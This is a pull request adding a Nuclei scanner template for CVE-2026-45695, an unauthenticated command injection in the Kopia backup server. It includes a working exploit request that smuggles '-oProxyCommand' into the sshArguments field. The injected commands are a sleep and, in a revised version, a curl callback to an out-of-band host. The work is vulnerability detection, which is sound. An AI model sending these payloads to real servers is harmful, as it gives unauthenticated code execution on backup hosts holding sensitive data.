### PR TITLE
Add CVE-2026-45695: Kopia Server SSH ProxyCommand Injection (Unauth RCE)

### DIFF
--- a/http/cves/2026/CVE-2026-45695.yaml
+++ b/http/cves/2026/CVE-2026-45695.yaml
@@ -1,0 +1,58 @@
+id: CVE-2026-45695
+
+info:
+  name: Kopia Server - SSH ProxyCommand Argument Injection (Unauthenticated RCE)
+  author: kenlacroix
+  severity: critical
+  description: |
+    Kopia backup server <= 0.22.3 exposes POST /api/v1/repo/exists without
+    authentication when started with --without-password. The endpoint
+    instantiates the storage backend, and for the sftp type with externalSSH
+    enabled it builds the ssh argument vector by splitting the caller-supplied
+    sshArguments on spaces with no tokenizer, so an -oProxyCommand=<cmd> token
+    is passed to ssh and executed via /bin/sh before any connection, resulting
+    in unauthenticated remote code execution as the server process.
+  impact: |
+    An unauthenticated attacker can execute arbitrary commands as the Kopia
+    server process (often root in a container), leading to full host compromise
+    and access to all managed backup data.
+  remediation: |
+    Upgrade to Kopia 0.23.0 or later, which refuses to bind an unauthenticated
+    server to a non-loopback address. Do not expose the server with
+    --without-password on untrusted networks.
+  reference:
+    - https://github.com/kopia/kopia/security/advisories/GHSA-2q4c-3mrw-63c3
+    - https://github.com/kopia/kopia/pull/5354
+    - https://orca.security/resources/blog/kopia-backup-rce-vulnerability/
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-45695
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-45695
+    cwe-id: CWE-88
+  metadata:
+    max-request: 1
+    vendor: kopia
+    product: kopia
+    shodan-query: http.title:"Kopia UI"
+  tags: cve,cve2026,kopia,rce,ssh,injection,sftp,intrusive
+
+http:
+  - raw:
+      - |
+        POST /api/v1/repo/exists HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"storage":{"type":"sftp","config":{"path":"/{{rand_base(6)}}","host":"127.0.0.1","port":22,"username":"{{rand_base(6)}}","externalSSH":true,"sshArguments":"-oProxyCommand=sleep${IFS}6"}}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration >= 6'
+
+      - type: word
+        part: body
+        words:
+          - 'unable to open SFTP storage'

--- a/http/cves/2026/CVE-2026-45695.yaml
+++ b/http/cves/2026/CVE-2026-45695.yaml
@@ -1,25 +1,15 @@
 id: CVE-2026-45695
 
 info:
-  name: Kopia Server - SSH ProxyCommand Argument Injection (Unauthenticated RCE)
+  name: Kopia Server 0.23.0 - Remote Code Execution
   author: kenlacroix
   severity: critical
   description: |
-    Kopia backup server <= 0.22.3 exposes POST /api/v1/repo/exists without
-    authentication when started with --without-password. The endpoint
-    instantiates the storage backend, and for the sftp type with externalSSH
-    enabled it builds the ssh argument vector by splitting the caller-supplied
-    sshArguments on spaces with no tokenizer, so an -oProxyCommand=<cmd> token
-    is passed to ssh and executed via /bin/sh before any connection, resulting
-    in unauthenticated remote code execution as the server process.
+    Kopia before version 0.23.0 allows unauthenticated remote code execution when started in server mode with the --without-password flag. When the /api/v1/repo/exists endpoint is exposed, it enables instantiation of the SFTP storage backend with user-supplied sshArguments. Due to improper argument parsing, an attacker may inject arbitrary SSH options such as -oProxyCommand, resulting in execution of arbitrary commands as the server process.
   impact: |
-    An unauthenticated attacker can execute arbitrary commands as the Kopia
-    server process (often root in a container), leading to full host compromise
-    and access to all managed backup data.
+    An unauthenticated attacker can execute arbitrary commands as the Kopia server process (often root in a container), leading to full host compromise and access to all managed backup data.
   remediation: |
-    Upgrade to Kopia 0.23.0 or later, which refuses to bind an unauthenticated
-    server to a non-loopback address. Do not expose the server with
-    --without-password on untrusted networks.
+    Upgrade to Kopia 0.23.0 or later, which refuses to bind an unauthenticated server to a non-loopback address. Do not expose the server with --without-password on untrusted networks.
   reference:
     - https://github.com/kopia/kopia/security/advisories/GHSA-2q4c-3mrw-63c3
     - https://github.com/kopia/kopia/pull/5354
@@ -34,7 +24,8 @@ info:
     max-request: 1
     vendor: kopia
     product: kopia
-    shodan-query: http.title:"Kopia UI"
+    shodan-query: http.favicon.hash:952466528
+    fofa-query: icon_hash=="952466528"
   tags: cve,cve2026,kopia,rce,ssh,injection,sftp,intrusive
 
 http:
@@ -44,15 +35,23 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"storage":{"type":"sftp","config":{"path":"/{{rand_base(6)}}","host":"127.0.0.1","port":22,"username":"{{rand_base(6)}}","externalSSH":true,"sshArguments":"-oProxyCommand=sleep${IFS}6"}}}
+        {"storage":{"type":"sftp","config":{"path":"/{{rand_base(6)}}","host":"127.0.0.1","port":22,"username":"{{rand_base(6)}}","externalSSH":true,"sshArguments":"-oProxyCommand=curl${IFS}{{interactsh-url}}"}}}
 
     matchers-condition: and
     matchers:
-      - type: dsl
-        dsl:
-          - 'duration >= 6'
-
       - type: word
         part: body
         words:
           - 'unable to open SFTP storage'
+          - 'error":'
+        condition: and
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - 'User-Agent: curl'


### PR DESCRIPTION
Adds a detection template for **CVE-2026-45695** (GHSA-2q4c-3mrw-63c3), an unauthenticated RCE in the [Kopia](https://kopia.io) backup server (<= 0.22.3).

`POST /api/v1/repo/exists` instantiates the storage backend unauthenticated (when started with `--without-password`). For `sftp` with `externalSSH`, Kopia splits the caller-supplied `sshArguments` on spaces with no tokenizer, so an `-oProxyCommand=<cmd>` token reaches `ssh` and is executed via `/bin/sh` before connecting — command execution as the server process.

### Detection
Time-based: injects `-oProxyCommand=sleep${IFS}6` (the `${IFS}` supplies the space, since the value can't contain literal spaces) and matches on `duration >= 6` together with the Kopia SFTP error body, confirming command execution without writing anything to disk.

### Testing
Validated with `nuclei -validate` and run against a live lab:
```
docker run -d -p 51515:51515 kopia/kopia:0.22.3 \
  server start --without-password --insecure --address 0.0.0.0:51515 --disable-csrf-token-checks
```
- True positive: matches `kopia/kopia:0.22.3` (request confirmed sent with `${IFS}` intact; `duration` ~6s).
- True negative: no match against a non-Kopia HTTP server; patched `0.23.0` refuses the unauthenticated non-loopback bind, so it is not reachable.

### References
- https://github.com/kopia/kopia/security/advisories/GHSA-2q4c-3mrw-63c3
- https://github.com/kopia/kopia/pull/5354
- https://orca.security/resources/blog/kopia-backup-rce-vulnerability/